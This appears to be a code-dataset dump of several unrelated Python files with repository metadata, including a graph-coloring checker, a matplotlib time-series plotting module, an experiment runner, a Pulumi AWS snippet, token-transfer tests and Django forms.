Each input file contains one test case. For each case, the first line gives two positive integers N and M (both no more than 104), being the total numbers of vertices and edges, respectively. Then M lines follow, each describes an edge by giving the indices (from 0 to N−1) of the two ends of the edge.
After the graph, a positive integer K (≤ 100) is given, which is the number of colorings you are supposed to check. Then K lines follow, each contains N colors which are represented by non-negative integers in the range of int. The i-th color is the color of the i-th vertex.
Output Specification:
For each coloring, print in a line k-coloring if it is a proper k-coloring for some positive k, or No if not.
Sample Input:
10 11
8 7
6 8
4 5
8 4
8 1
1 2
1 4
9 8
9 1
1 0
2 4
4
0 1 0 1 4 1 0 1 3 0
0 1 0 1 4 1 0 1 0 0
8 1 0 1 4 1 0 5 3 0
1 2 3 4 5 6 7 8 8 9
Sample Output:
4-coloring
No
6-coloring
No
"""
######################################################
"""
非常简单,一次通过
"""
######################################################
n, m = map(int, input().split())
edges = []
for _ in range(m):
edges.append(list(map(int, input().split())))
for _ in range(int(input())):
coloring = list(map(int, input().split()))
for a, b in edges:
if coloring[a] == coloring[b]:
print('No')
break
else:
print('%d-coloring' % len(set(coloring)))
| UTF-8 | Python | false | false | 1,735 | py | 155 | 1154 Vertex Coloring.py | 155 | 0.643234 | 0.598125 | 0 | 58 | 28.431034 | 305 |
maretec/MOHID_python_tools | 19,464,791,790,474 | 703d88fd031488b7b5fd28c0fa24bbcddb6b60bb | 282f44c3f10564489c3338f95295812fb9176a4e | /MapasDeCampos_by_hidromod/src/ModuloTimeSeriesDraw.py | 1a94d03bf6f6fc2bf17a2838bbbde252c34f015d | [
"MIT"
]
| permissive | https://github.com/maretec/MOHID_python_tools | 92eebc44be3b01bda57cfe76ac974abf5c113f58 | c69c03294e7e371be86cf980133bd8ae6829df60 | refs/heads/master | 2023-02-07T14:10:16.411017 | 2020-03-11T13:38:57 | 2020-03-11T13:38:57 | 151,395,700 | 8 | 11 | MIT | false | 2023-01-25T11:10:54 | 2018-10-03T10:27:13 | 2020-12-17T20:01:41 | 2023-01-25T11:09:54 | 242,146 | 8 | 7 | 0 | Python | false | false | import matplotlib.pyplot as plt
import matplotlib.pyplot as plt_date
import matplotlib.dates as datesMat
import logging
import sys
from matplotlib import gridspec
import matplotlib as mpl
from matplotlib.offsetbox import AnchoredText
import numpy as np
import ModuloTimeSeriesFunctions as MTSF
class Draw_timeseries:
def __init__(plottype,Timeseries,options):
if options.plot_image_type == 'timeseries':
if plottype == 1:
Draw_timeseries.drawplot_solo(options,serie1y)
elif plottype == 2:
Draw_timeseries.drawplot2(Timeseries,options)
elif plottype == 3:
DRAW.drawplot_solo(options,serie1y)
elif plottype == 4:
Draw_timeseries.drawpscatter(options,serie1y)
elif plottype == 5:
Draw_timeseries.drawplot5(Timeseries,options)
if options.plot_image_type == 'maps':
if plottype == 2:
Draw_timeseries.drawplot2Maps(Timeseries,options)
def drawplot2(Timeseries,options):
import matplotlib.pyplot as plt
import matplotlib.pyplot as plt_date
import matplotlib.dates as datesMat
import logging
import sys
try:
logging.info(': A desenhar o Grafico')
fig = plt.figure()
ax1 = fig.add_subplot(111)
if options.xpixel is not None and options.ypixel is not None:
fig.set_size_inches(float(options.xpixel)/float(options.dpi),float(options.ypixel)/float(options.dpi),forward=True)
fig.subplots_adjust(bottom=0.07,left=0.07, right=0.99, top=0.99)
ax1.set_title(options.title,fontsize=options.fontsize)
ax1.set_xlabel(options.xlabel,fontsize=options.fontsize-1)
if options.xlabel is None:
ax1.set_xlabel('',fontsize=options.fontsize-1)
else:
ax1.set_xlabel(options.xlabel,fontsize=options.fontsize-1)
if options.ylabel is None:
ax1.set_ylabel('',fontsize=options.fontsize-1)
else:
ax1.set_ylabel(options.ylabel,fontsize=options.fontsize-1)
ax1.tick_params(labelsize=options.fontsize-1)
ax1.hold(True)
for x in range(0,len(options.files_list)):
linestyle1= options.files_list_type[x].strip('"\'')
try:
plt_date.plot_date(datesMat.date2num(Timeseries[x].ValuesX_datenum),
Timeseries[x].ValuesY,
color =options.files_list_color[x].strip('"\''),
label =options.files_list_name[x],
linestyle = linestyle1,
linewidth =options.linewidth,
xdate =True,
ydate =False,
marker =None)
except Exception as ex:
logging.info(': Modulo TimeSeries Draw : Error 001 : Failed to draw TimeSerie Plot "' + options.files_list_name[0] + '"'+ ex)
logging.shutdown()
sys.exit()
fig.tight_layout()
# Valor maximo da serie
if options.Ymax is None:
options.Ymax = max(Timeseries.Serie1.ValuesY)
if options.Ymin is None:
options.Ymax = min(Timeseries.Serie1.ValuesY)
leg = ax1.legend(fontsize=options.fontsize-1)
ax1.set_ylim([options.Ymin, options.Ymax])
fig.autofmt_xdate()
except Exception as ex:
logging.info(': Error 008 : Cant plot the data')
logging.shutdown()
sys.exit()
try:
logging.info(': A salvar a figura')
fig.savefig(options.figureOutName, facecolor='w', edgecolor='w',
orientation='portrait', papertype=None, format=None,
transparent=True, bbox_inches='tight', pad_inches=0.01, dpi=options.dpi)
except Exception as ex:
logging.info(': Modulo TimeSeries Draw : Error 001 : Error Saving the Figure')
logging.shutdown()
sys.exit()
def drawplot_solo(serie1x,serie1y,serie2x,serie2y,options):
logging.info('Trying to plot a single timeserie, not configured to')
logging.shutdown()
sys.exit()
def drawpscatter(Timeseries,options):
logging.info('Trying to plot a scatter plot, not configured to')
logging.shutdown()
sys.exit()
def drawmultiplot(serie1x,serie1y,serie2x,serie2y,options):
logging.info('Trying to plot a multi plot, not configured to')
logging.shutdown()
sys.exit()
def drawplot5(Timeseries,options):
try:
logging.info(': A desenhar o Grafico')
fig = plt.figure()
gs = gridspec.GridSpec(1, 2, width_ratios=[5, 1])
ax1 = plt.subplot(gs[0]) # plot das séries
ax2 = plt.subplot(gs[1]) # lista de validaçoes
if options.xpixel is not None and options.ypixel is not None:
fig.set_size_inches(float(options.xpixel)/float(options.dpi),float(options.ypixel)/float(options.dpi),forward=True)
try:
ax1.set_title(options.title,fontsize=options.fontsize)
except:
logging.info(': Modulo TimeSeries Draw : Error 002 : Erro no titulo/resumo erros')
logging.shutdown()
sys.exit()
ax1.set_xlabel(options.xlabel,fontsize=options.fontsize-1)
if options.xlabel is None:
ax1.set_xlabel('',fontsize=options.fontsize-1)
else:
ax1.set_xlabel(options.xlabel,fontsize=options.fontsize-1)
if options.ylabel is None:
ax1.set_ylabel('',fontsize=options.fontsize-1)
else:
ax1.set_ylabel(options.ylabel,fontsize=options.fontsize-1)
ax1.tick_params(labelsize=options.fontsize-1)
ax1.hold(True)
# reduz o tamanho da série em função da primeira série
max_plot_number = 1000
plot_every_x_points = []
try:
if len(Timeseries.Serie1.ValuesX_datenum) <= max_plot_number:
plot_every_x_points = 1
else:
for x in range(1,1000):
if round(len(Timeseries.Serie1.ValuesX_datenum) / max_plot_number) <= max_plot_number:
plot_every_x_points = x
break
except Exception as ex:
logging.info(': Modulo TimeSeries Draw : Error 003 : Erro do limite de pontos a ser desenhado'+ str(ex))
logging.shutdown()
sys.exit()
# Desenha Plot 1
try:
plot1=ax1.plot_date(datesMat.date2num(Timeseries.Serie1.ValuesX_datenum[::plot_every_x_points]),
[x for x in Timeseries.Serie1.ValuesY[::plot_every_x_points]],
marker='*',
color='r',
markersize=2,
label=options.files_list_name[0],
xdate=True,
ydate=False,
markeredgecolor ='r')
except Exception as ex:
logging.info(': Modulo TimeSeries Draw : Error 004 : Erro a desenhar o Plot 1'+ str(ex))
logging.shutdown()
sys.exit()
# Desenha Plot 2
try:
plot2=ax1.plot_date(datesMat.date2num(Timeseries.Serie2.ValuesX_datenum[::plot_every_x_points]),
[x for x in Timeseries.Serie2.ValuesY[::plot_every_x_points]],
'-',
color='k',
linewidth=options.linewidth,
label=options.files_list_name[1],
xdate=True,
ydate=False)
except Exception as ex:
logging.info(': Modulo TimeSeries Draw : Error 005 : Erro a desenhar o Plot 2 ' + str(ex))
logging.shutdown()
sys.exit()
# Valor maximo da serie
try:
limits=[min(Timeseries.Serie1.ValuesY),min(Timeseries.Serie2.ValuesY),max(Timeseries.Serie1.ValuesY),max(Timeseries.Serie2.ValuesY)]
if options.Ymax is None:
options.Ymax = max(limits)+0.15*(max(limits)-min(limits))
except Exception as ex:
logging.info(': Modulo TimeSeries Draw : Error 006 : Não consegui implemtnar os limites YMAX pedido ' + str(ex))
logging.shutd
# Valor minimo da serie
try:
limits=[min(Timeseries.Serie1.ValuesY),min(Timeseries.Serie2.ValuesY),max(Timeseries.Serie1.ValuesY),max(Timeseries.Serie2.ValuesY)]
if options.Ymin is None:
options.Ymin = round(min(limits)-0.15*(max(limits)-min(limits)),1)
if round(options.Ymin,1) == 0:
options.Ymin = 0
elif min(limits) >0 or options.Ymin < 0:
options.Ymin = 0
except Exception as ex:
logging.info(': Modulo TimeSeries Draw : Error 007 : Não consegui implementar os limites YMIN pedido ' + str(ex))
logging.shutdown()
sys.exit()
ax1.set_ylim([options.Ymin, options.Ymax])
# Desenhar Legenda
try:
mpl.rcParams['legend.numpoints'] = 1
leg= ax1.legend(fontsize=options.fontsize-1, loc='upper center',ncol=3, fancybox=True, shadow=True)
except Exception as ex:
logging.info(': Modulo TimeSeries Draw : Error 008 : Problemas a desenhar a Legenda do grafico ' + str(ex))
logging.shutdown()
sys.exit()
# Formatar a caixa de erros.
try:
xxx=list()
numero_casas_decimais=3
if options.stdev_obs == 1:
xxx.append('Stdev Obs = '+ str(format(round(Timeseries.Serie1.rmse,numero_casas_decimais))) + ' ' + options.parameter + '\n')
if options.average_obs == 1:
xxx.append('Average Obs = '+ str(format(round(Timeseries.Serie1.average_obs,numero_casas_decimais))) + ' ' + options.parameter + '\n')
if options.bias == 1:
xxx.append('BIAS = '+ str(format(round(Timeseries.Serie1.bias,numero_casas_decimais))) + ' ' + options.parameter + '\n')
if options.rmse == 1:
xxx.append('RMSE = '+ str(format(round(Timeseries.Serie1.rmse,numero_casas_decimais))) + ' ' + options.parameter + '\n')
if options.normalise_rmse == 1:
xxx.append('Normalise RMSE = '+ str(format(round(Timeseries.Serie1.normalise_rmse,numero_casas_decimais))) + '%\n')
if options.unbias_rmse == 1:
xxx.append('Unbias RMSE = '+ str(format(round(Timeseries.Serie1.unbias_rmse,numero_casas_decimais))) + ' ' + options.parameter + '\n')
if options.normalise_unbias_rmse == 1:
xxx.append('Normalise Unbias RMSE = '+ str(format(round(Timeseries.Serie1.normalise_unbias_rmse,numero_casas_decimais))) + '%\n')
if options.rcorr == 1:
xxx.append('R = '+ str(format(round(Timeseries.Serie1.rcorr,numero_casas_decimais))) + '\n')
if options.nash_sutcliffe == 1:
xxx.append('Nash-Sutcliff = '+ str(format(round(Timeseries.Serie1.nash_sutcliffe,numero_casas_decimais))) + '\n')
if options.skill == 1:
xxx.append('SKILL = '+ str(format(round(Timeseries.Serie1.skill,numero_casas_decimais))) + '\n')
if options.rcorr_quad == 1:
xxx.append('Rcorr Quad = '+ str(format(round(Timeseries.Serie1.rcorr_quad,numero_casas_decimais))) + '\n')
if options.z_fisher == 1:
xxx.append('Z-Fisher = '+ str(format(round(Timeseries.Serie1.z_fisher,numero_casas_decimais))) + '\n')
if options.alfa == 1:
xxx.append('Alfa = '+ str(format(round(Timeseries.Serie1.alfa,numero_casas_decimais))) + '\n')
if options.beta_1 == 1:
xxx.append('Beta 1 = '+ str(format(round(Timeseries.Serie1.beta_1,numero_casas_decimais))) + '\n')
if options.am == 1:
xxx.append('Am = '+ str(format(round(Timeseries.Serie1.am,numero_casas_decimais))) + ' ' + options.parameter + '\n')
if options.bm == 1:
xxx.append('Bm = '+ str(format(round(Timeseries.Serie1.bm,numero_casas_decimais))) + ' ' + options.parameter + '\n')
except Exception as ex:
logging.info(': Modulo TimeSeries Draw : Error 009 : Erro criar string de validação com ' + str(ex) + '\n')
logging.shutdown()
sys.exit()
# Desenha a caixa dos erros
try:
ax2.axis('off')
anchored_text = AnchoredText(('\n'.join(xxx)),loc=7,prop=dict(size=options.fontsize),frameon=False)
ax2.add_artist(anchored_text)
except Exception as ex:
logging.info(': Modulo TimeSeries Draw : Error 010 : Erro a desenhar string de erros ' + str(ex))
logging.shutdown()
sys.exit()
fig.autofmt_xdate()
#try:
#fig.tight_layout()
#except Exception as ex:
#logging.info(': Error 008 : Falha a fazer o tight layout')
#logging.shutdown()
#sys.exit()
except Exception as ex:
logging.info(': Modulo TimeSeries Draw : Error 011 : Cant plot the data')
logging.shutdown()
sys.exit()
try:
logging.info(': A salvar a figura')
fig.savefig(options.figureOutName, facecolor='w', edgecolor='w',
orientation='portrait',bbox_inches='tight', papertype=None, format=None,
transparent=True, pad_inches=0.1, dpi=options.dpi)
logging.info(': SUCESSO : figura salva')
except Exception as ex:
logging.info(': Modulo TimeSeries Draw : Error 012 : Error Saving the Figure')
logging.shutdown()
sys.exit()
def drawplot2Maps(Timeseries,options):
try:
logging.info(': Ploting TimeSerie Graph')
ax = plt.subplot(str(options.validation_grid[0])+str(options.validation_grid[1])+str(int(options.maps_validation_parameters[options.subplot_index][1])))
#ax.set_aspect(1.0)
a=['','','','','','','','']
#ax.set_yticks([])
for x in range(len(options.timeseries_validation_parameters)):
try:
aux=0
rot=90
auxlabelpad=0
if x is not 0:
if int(options.timeseries_validation_parameters[x-1][6]) is not int((options.timeseries_validation_parameters[x][6])):
ax=ax.twinx()
rot=270
auxlabelpad=8
else:
aux =1
linestyle1 = None;
if aux == 1:
linestyle1= '--'
del aux
else:
linestyle1= '-'
a[x]=ax.plot_date(datesMat.date2num(Timeseries[x].ValuesX_datenum),
Timeseries[x].ValuesY,
color =options.timeseries_validation_parameters[x][3].strip(' ')[1],
label =options.timeseries_validation_parameters[x][7],
linestyle = linestyle1,
xdate =True,
ydate =False,
marker =None)
try:
if options.dynamic_limits == 1:
MTSF.TS._Dynamic_plot_limit(Timeseries,ax, options, x)
else:
ax.set(ylim=[float(options.timeseries_validation_parameters[x][4]),float(options.timeseries_validation_parameters[x][5])])
except Exception as ex:
logging.info(': Modulo TimeSeries Functions : Error 012a : Dynamic plot timeseries limits' + ex)
logging.shutdown()
sys.exit()
plt.ylabel(options.timeseries_validation_parameters[x][8].strip(),
rotation=rot,
labelpad=auxlabelpad,
color=options.timeseries_validation_parameters[x][3].strip(' ')[1])
plt.setp( ax.xaxis.get_majorticklabels(), rotation=20, horizontalalignment='right' )
ax.xaxis.set_major_locator(datesMat.AutoDateLocator())
ax.xaxis.set_major_formatter(datesMat.DateFormatter('%Y %m %d'))
for tl in ax.get_yticklabels():
tl.set_color(options.timeseries_validation_parameters[x][3].strip(' ')[1])
#ax.set_ylim([0,100])
except Exception as ex:
logging.info(': Modulo TimeSeries Draw : Error 013 : Erro a desenhar o Plot '+ options.timeseries_validation_parameters[x][7] + str(ex))
logging.shutdown()
sys.exit()
# Desenhar Legenda
try:
#mpl.rcParams['legend.numpoints'] = 2
plt.subplots_adjust()
b=[]
for x in range(len(options.timeseries_validation_parameters)):
b=b+a[x]
labs = [l.get_label() for l in b]
for x in range(len(labs)):
labs[x]=labs[x].strip()
leg= ax.legend(b,
labs,
fontsize=options.fontsize,
loc='upper center',
ncol=3,
fancybox=False,
shadow=False,
handlelength=4)
except Exception as ex:
logging.info(': Modulo TimeSeries Draw : Error 014 : Problemas a desenhar a Legenda do grafico ' + str(ex))
logging.shutdown()
sys.exit()
#fig = plt.gcf()
#fig.autofmt_xdate()
except Exception as ex:
logging.info(': Modulo TimeSeries Draw : Error 015 : Cant plot the ')
logging.shutdown()
sys.exit()
| UTF-8 | Python | false | false | 20,104 | py | 73 | ModuloTimeSeriesDraw.py | 41 | 0.497611 | 0.483378 | 0 | 432 | 45.506944 | 164 |
mmweber2/reps | 18,906,446,050,038 | 7227bfc4431107a9ca11b8ef0536ecd594872ec0 | 570089a94cc1ee992eb4325998c84c697850ce15 | /codefights/possibleSums.py | 5dbcd5dfd12de382eaf0d260b0d86b4d378d6351 | []
| no_license | https://github.com/mmweber2/reps | a707e2ad192267a6b4137437cccc817eb27f2903 | 8ce26b21f0898ebfc0784261393efad7b1b99d76 | refs/heads/master | 2020-05-21T16:45:27.338269 | 2017-12-10T02:23:55 | 2017-12-10T02:23:55 | 62,955,968 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | def possibleSums(coins, quantity):
sums = set()
sums.add(0)
for coin, quant in zip(coins, quantity):
new_sums = set() # Don't confuse new and old values
for coin_total in xrange(0, (coin * quant) + 1, coin):
for s in sums:
new_sums.add(s + coin_total)
sums = new_sums
return len(sums) - 1 # Account for 0 | UTF-8 | Python | false | false | 372 | py | 61 | possibleSums.py | 60 | 0.564516 | 0.551075 | 0 | 10 | 36.3 | 62 |
WalkingMachine/sara_commun | 1,254,130,466,044 | 4449d19e1e54cac9e7e06b143879c2adbf6356c2 | 12bd6522cee8dba32e1ef0dd1d012226ed572874 | /wm_ork/transparent_objects/src/apps/runExperiments.py | a4781b0adaa4b3cfed31a7253257470de6bde0d8 | []
| no_license | https://github.com/WalkingMachine/sara_commun | 55a42ffc0f37821b2d678bedf2df87309227da61 | 79585904ded31eca418614f0306a7308b24ccd0e | refs/heads/master | 2019-07-14T17:47:48.126153 | 2016-10-28T15:37:28 | 2016-10-28T15:37:27 | 58,494,906 | 9 | 1 | null | null | null | null | null | null | null | null | null | null | null | null | null | import subprocess
import os
import sys
import psutil
import time
import re
runner='/home/ilysenkov/ecto_fuerte/build/bin/transparentExperiments'
#runner='/home/ilysenkov/itseezMachine/home/ilysenkov/ecto/server_build/bin/transparentExperiments'
runnerName = 'transparentExperiments'
trainedModelsPath='/media/2Tb/transparentBases/trainedModels/'
experimentsCoresCount = 7
#dataset='/media/2Tb/transparentBases/different_clutter/base_3/'
#datasetName = 'different_clutter_3'
#allObjects = ['bank', 'bucket', 'bottle', 'glass', 'wineglass']
#dataset='/media/2Tb/transparentBases/different_clutter/base_ocl/'
#datasetName = 'different_clutter_ocl'
#allObjects = ['bank', 'bucket', 'bottle', 'glass', 'wineglass']
#dataset='/media/2Tb/transparentBases/good_clutter/base/'
#datasetName = 'good_clutter'
#allObjects = ['bank', 'bucket', 'bottle', 'glass', 'wineglass', 'sourCream']
#dataset='/media/2Tb/transparentBases/fixedOnTable/base/'
#datasetName = 'fixed_on_table'
#allObjects = ['bank', 'bucket', 'bottle', 'glass', 'wineglass', 'sourCream']
dataset='/media/2Tb/transparentBases/finalClutter/base/'
datasetName = 'finalClutter'
allObjects = ['bank', 'bucket', 'bottle', 'glass']
baseLogsPath = '/home/ilysenkov/results/occlusions/'
bigSleepTime = 10
smallSleepTime = 1
def getRunProcessesCount():
processes = psutil.get_process_list()
runProcessesCount = 0
for proc in processes:
match = re.match(runnerName, proc.name)
if (match != None):
runProcessesCount += 1
return runProcessesCount
if __name__ == '__main__':
assert len(sys.argv) == 2, sys.argv[0] + ' <experimentsName>'
baseLogsPath += sys.argv[1]
logsPath = baseLogsPath + '/' + datasetName
if not os.path.exists(baseLogsPath):
os.makedirs(baseLogsPath)
if not os.path.exists(logsPath):
os.makedirs(logsPath)
for obj in allObjects:
runProcessesCount = getRunProcessesCount()
while (runProcessesCount >= experimentsCoresCount):
time.sleep(bigSleepTime)
runProcessesCount = getRunProcessesCount()
logFilename = logsPath + '/' + obj
logFile = open(logFilename, 'w')
command = [runner, trainedModelsPath, dataset, obj]
process = subprocess.Popen(command, stdout=logFile, stderr=logFile)
print obj
time.sleep(smallSleepTime)
#process = subprocess.Popen(command, stdout=subprocess.PIPE)
#print process.stdout.read()
| UTF-8 | Python | false | false | 2,477 | py | 390 | runExperiments.py | 225 | 0.698426 | 0.691562 | 0 | 77 | 31.168831 | 99 |
ehubbard/templates-aws | 2,611,340,148,233 | 220c3edfdd52b6dc1f4c108337af451691da7580 | 2a67dc681af4c4b9ef7a8e18c2ff75377dc5b44f | /aws.apigatewayv2.Authorizer.basic-http-api-python/__main__.py | a429a9be0ee4ec94913ed63b5db33be1e7c13990 | []
| no_license | https://github.com/ehubbard/templates-aws | e323b693a18234defe6bd56ffcc64095dc58e3a1 | 2ae2e7a5d05490078017fed6d132dcdde1f21c63 | refs/heads/master | 2022-11-17T13:53:14.531872 | 2020-07-10T21:56:27 | 2020-07-10T21:56:27 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import pulumi
import pulumi_aws as aws
example = aws.apigatewayv2.Authorizer("example",
api_id=aws_apigatewayv2_api["example"]["id"],
authorizer_type="JWT",
identity_sources=["$request.header.Authorization"],
jwt_configuration={
"audience": ["example"],
"issuer": f"https://{aws_cognito_user_pool['example']['endpoint']}",
})
| UTF-8 | Python | false | false | 364 | py | 2,779 | __main__.py | 2,048 | 0.651099 | 0.645604 | 0 | 11 | 32 | 76 |
Jlevjean/SFT-Protocol | 15,719,580,307,957 | 4bf4e20078b0028f3f2acd9e8d807a6f560dc216 | 0e7514552dfc05b63738228e99d0b5333b8e9d41 | /tests/security_token/transfer/investor_counts.py | 9d7efec93cc3cb98d46296e4ed0e39576c8c5a4d | [
"Apache-2.0"
]
| permissive | https://github.com/Jlevjean/SFT-Protocol | cd6161c2087f5ed1000a533df18c2209d043c280 | bbfaf94df448bf9e653ae2f7d8a1edbf9d693a46 | refs/heads/master | 2020-05-17T23:20:52.137990 | 2019-04-28T21:38:21 | 2019-04-28T21:38:21 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | #!/usr/bin/python3
from brownie import *
from scripts.deployment import main
def setup():
config['test']['always_transact'] = False
main(SecurityToken)
global token, issuer
token = SecurityToken[0]
issuer = IssuingEntity[0]
token.mint(issuer, 1000000, {'from': a[0]})
def issuer_to_investor():
'''investor counts - issuer/investor transfers'''
_check_countries()
token.transfer(a[1], 1000, {'from': a[0]})
_check_countries(one=(1, 1, 0))
token.transfer(a[1], 1000, {'from': a[0]})
token.transfer(a[2], 1000, {'from': a[0]})
token.transfer(a[3], 1000, {'from': a[0]})
_check_countries(one=(2, 1, 1), two=(1, 1, 0))
token.transfer(a[1], 996000, {'from': a[0]})
_check_countries(one=(2, 1, 1), two=(1, 1, 0))
token.transfer(a[0], 1000, {'from': a[1]})
_check_countries(one=(2, 1, 1), two=(1, 1, 0))
token.transfer(a[0], 997000, {'from': a[1]})
_check_countries(one=(1, 0, 1), two=(1, 1, 0))
token.transfer(a[0], 1000, {'from': a[2]})
token.transfer(a[0], 1000, {'from': a[3]})
_check_countries()
def investor_to_investor():
'''investor counts - investor/investor transfers'''
token.transfer(a[1], 1000, {'from': a[0]})
token.transfer(a[2], 1000, {'from': a[0]})
token.transfer(a[3], 1000, {'from': a[0]})
token.transfer(a[4], 1000, {'from': a[0]})
token.transfer(a[5], 1000, {'from': a[0]})
token.transfer(a[6], 1000, {'from': a[0]})
_check_countries(one=(2, 1, 1), two=(2, 1, 1), three=(2, 1, 1))
token.transfer(a[2], 500, {'from': a[1]})
_check_countries(one=(2, 1, 1), two=(2, 1, 1), three=(2, 1, 1))
token.transfer(a[2], 500, {'from': a[1]})
_check_countries(one=(1, 0, 1), two=(2, 1, 1), three=(2, 1, 1))
token.transfer(a[3], 2000, {'from': a[2]})
_check_countries(two=(2, 1, 1), three=(2, 1, 1))
token.transfer(a[3], 1000, {'from': a[4]})
_check_countries(two=(1, 1, 0), three=(2, 1, 1))
token.transfer(a[4], 500, {'from': a[3]})
_check_countries(two=(2, 1, 1), three=(2, 1, 1))
def _check_countries(one=(0,0,0),two=(0,0,0),three=(0,0,0)):
check.equal(
issuer.getInvestorCounts()[0][:3],
(
one[0]+two[0]+three[0],
one[1]+two[1]+three[1],
one[2]+two[2]+three[2]
)
)
check.equal(issuer.getCountry(1)[1][:3], one)
check.equal(issuer.getCountry(2)[1][:3], two)
check.equal(issuer.getCountry(3)[1][:3], three) | UTF-8 | Python | false | false | 2,460 | py | 50 | investor_counts.py | 48 | 0.555285 | 0.460569 | 0 | 68 | 35.191176 | 67 |
moki/aoc2015 | 14,018,773,299,498 | 90a431a2c8633638cab7ae5c535d73d6f0c35ae0 | 1f28dd28e049cd0a9af1259b3213ba13fed8cb69 | /day/day_03/solution.py | 0621340bef611cfc69ab0795e022249ccfc59d31 | [
"BSD-3-Clause"
]
| permissive | https://github.com/moki/aoc2015 | 615b40e21a701d78afc2b38aa91e2cd6e95a5cdc | da43fccd20d154840161c022d1f3c0f70035d604 | refs/heads/main | 2023-03-09T13:08:50.663737 | 2021-02-27T13:47:59 | 2021-02-27T13:47:59 | 342,246,538 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | def _hash(x, y):
return hash(str(x) + "," + str(y))
def part_1(input):
x, y = 0, 0
move_map = {"^": (0, 1), ">": (1, 0), "<": (-1, 0), "v": (0, -1)}
house_map = dict()
house_map[_hash(x, y)] = 1
for c in input:
_x, _y = move_map.get(c, (0, 0))
x += _x
y += _y
house_map[_hash(x, y)] = 1
return len(house_map)
def part_2(input):
hx, hy = 0, 0
rx, ry = 0, 0
move_map = {"^": (0, 1), ">": (1, 0), "<": (-1, 0), "v": (0, -1)}
house_map = dict()
house_map[_hash(0, 0)] = 1
i = 0
for c in input:
_x, _y = move_map.get(c, (0, 0))
if i % 2 == 0:
_x += hx
_y += hy
hx = _x
hy = _y
else:
_x += rx
_y += ry
rx = _x
ry = _y
house_map[_hash(_x, _y)] = 1
i = i + 1
return len(house_map)
| UTF-8 | Python | false | false | 923 | py | 9 | solution.py | 8 | 0.339112 | 0.297941 | 0 | 57 | 15.192982 | 69 |
JensGutow/AdventOfCode2020 | 12,309,376,297,589 | 1cd05dce127d982649967690329ccdca8a411136 | b54ed58e5a6e9d8f468c1f36544d6782b276f3be | /tag_09.py | f96ddb9a8c1d8159f4a9791378d5326cbf8e2324 | []
| no_license | https://github.com/JensGutow/AdventOfCode2020 | c69ff3d1be5ff6cf399c4a3ecb14fa1c70323d74 | 9e116175f0042dacdde182424f1286801e7da131 | refs/heads/main | 2023-02-08T10:00:43.584837 | 2020-12-31T06:57:18 | 2020-12-31T06:57:18 | 322,389,060 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import itertools
import time
def get_puzzle(file_name):
pre_Length = 5
p = []
with open(file_name) as f:
p = [int(i) for i in f.read().split()]
return p
def check(text, p_len, i):
check = [sum(x) for x in itertools.combinations(set(text[i-p_len: i]),2)]
return text[i] in check
text = get_puzzle("tag_09.txt")
start = time.perf_counter()
p_len = 25
last = current = 0
for i in range(p_len, len(text)):
if not check(text, p_len, i): break
print(i, text[i], time.perf_counter() - start)
start = time.perf_counter()
th = text[i]
i0 = i1 = 0
s = 2 * text[i0]
check = False
result = None
for i0 in range(len(text)):
if result: break
for i1 in range(i0+1, len(text)):
s = sum(text[i0:i1])
if s > th:
break
if s == th:
seq = text[i0:i1]
min_ = min(seq)
max_ = max(seq)
result = min_ + max_
print (result)
break
print (result, time.perf_counter() - start)
| UTF-8 | Python | false | false | 1,027 | py | 28 | tag_09.py | 25 | 0.538462 | 0.518987 | 0 | 48 | 20.375 | 77 |
benzyp/lakewoodSimcha | 19,292,993,121,140 | f120e0e49e80a0831eed4c49b6af757f69ca47bc | fd2774da9a9a9d311169685eee8331aa034f4ecd | /LakewoodSimcha/app/forms.py | 1a163e065c352a27176f14e71288f1908c5883b8 | []
| no_license | https://github.com/benzyp/lakewoodSimcha | 0d54bd343943d583347879bad971aade3eb3ef9a | 02b9995eef46677f749e8ac4e29a576acf56fb3f | refs/heads/master | 2020-03-13T23:31:15.342130 | 2018-06-19T02:55:36 | 2018-06-19T02:55:36 | 131,336,852 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | """
Definition of forms.
"""
from django import forms
from django.contrib.auth.forms import AuthenticationForm
from django.utils.translation import ugettext_lazy as _
from django.forms import Form
from app.models import Event,Venue,Customer
from datetimewidget.widgets import DateTimeWidget
class BootstrapAuthenticationForm(AuthenticationForm):
"""Authentication form which uses boostrap CSS."""
username = forms.CharField(max_length=254,
widget=forms.TextInput({
'class': 'form-control',
'placeholder': 'User name'}))
password = forms.CharField(label=_("Password"),
widget=forms.PasswordInput({
'class': 'form-control',
'placeholder':'Password'}))
class EventForm(forms.ModelForm):
class Meta:
model = Event
fields = ('start','event_type', 'title', 'venue', 'description')
dateTimeOptions = { 'showMeridian':True }
widgets = {#Use localization and bootstrap 3
'start': DateTimeWidget(attrs={'id':"start"}, usel10n = True, bootstrap_version=3, options=dateTimeOptions)
}
def __init__(self, venue, *args, **kwargs):
super(EventForm, self).__init__(*args, **kwargs)
#set the venue field to only include venues for the booking at hand
self.fields['venue'].queryset = Venue.objects.filter(venue_type=venue)
class CustomerForm(forms.ModelForm):
class Meta:
model = Customer
exclude = ()
class AdminEventForm(forms.ModelForm):
class Meta:
model = Event
fields = ('start','confirmed','venue')
dateTimeOptions = { 'showMeridian':True }
widgets = {'venue': forms.HiddenInput(),'start':DateTimeWidget(attrs={'id':"start"},usel10n = True, bootstrap_version=3, options=dateTimeOptions)}
labels = {'venue':_('')}
class EditDateForm(forms.Form):
phone = forms.CharField(max_length=10)
dateTimeOptions = { 'showMeridian':True }
edit_event_start = forms.DateTimeField(label = 'New Date', widget=DateTimeWidget(attrs={'id':"start"},usel10n = True, bootstrap_version=3, options=dateTimeOptions))
class UploadFileForm(forms.Form):
venue = forms.IntegerField(widget = forms.HiddenInput(), label = '')
file = forms.FileField() | UTF-8 | Python | false | false | 2,409 | py | 29 | forms.py | 16 | 0.626816 | 0.620589 | 0 | 57 | 41.280702 | 168 |
AmolPachpute/RightArm | 2,130,303,821,066 | ba1d0cd3ce5e70824d711bf85e884f9b8cbbb3ad | 624e0e8d61887303c257c93ac77d799ed8518af5 | /Projects/models.py | 4ea6f2d77147cf5aaffd7d4effb51e54f1c37ecc | []
